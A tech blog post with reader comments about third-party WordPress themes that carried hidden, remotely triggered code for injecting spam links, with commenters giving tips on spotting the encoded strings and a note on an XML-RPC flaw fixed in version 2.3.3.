Blog Post

Blog Hacks Coming Back to Roost?

Stay on Top of Enterprise Technology Trends

Get updates impacting your industry from our GigaOm Research Community
Join the Community!

Back in November, we looked at WordPress themes being distributed by third parties who’d embedded hidden code to allow the insertion of arbitrary content. Now a rash of sites are reporting that their blogs have been subverted.

Among them is Deep Jive:

“I was getting listed in Google for all manner of sneaky (and NSFW terms), so that people could click on those links with the hacker getting the affiliate cash — but *actually*, said hackers also inserted fake tempates into my wordpress theme.”

There are lots of reasons a hacker may want to inject code into a page:

  • To infect visitors by exploiting a browser vulnerability
  • To place ads they can then get revenue from
  • To embed links to blogs they own, improving their page rank
  • To entice people to click on links that lead them elsewhere

The clever thing about the WordPress hack was that it would check for code to insert into a page each time it was loaded, but if none was available, it would just sit there quietly. Which means that the creator of the theme could count how many sites their theme had “infected” based on hits to the embedded URL. Once enough sites had the themes, the creator could start supplying code to the blogs.

In this case, it appears that most of the sites are being used to send traffic to a few sites, which in turn have been morphed into stores.

15 Responses to “Blog Hacks Coming Back to Roost?”

  1. Ha, the dark side of AJAX! Check your WordPress themes — look in the footer file first — for a long string of characters that doesn’t look like HTML, PHP or Javascript. It’s an encrypted string, and anyone can insert it into any theme, and then upload that theme anywhere they like.

    I started noticing this a year or so ago after downloading themes from the ‘free themes’ site. Stick with’s theme view, or learn enough code to sniff out bad stuff.

  2. FWICT, the XML-RPC vulnerability that wp 2.3.3 fixed seems to be having greater impact than the nefarious theme download hack — old installations being compromised hundreds of times a day. Technorati’s crawler is no longer updating vulnerable blogs bearing symptoms of being compromised. I posted a heads up yesterday and more details last night.

  3. @Grant yea, I think a lot of people are downloading themes from untrustworthy sources. One of the major problems is that hasn’t allowed theme developers to upload new themes or updates to old themes for nearly 8 months, that means if you want fresh new themes you have to look for them elsewhere.

  4. Um. Don’t execute untrustworthy code? Did people suddenly go mad and start downloading themes from all over the place, or are the affected themes from semi-trustable sources?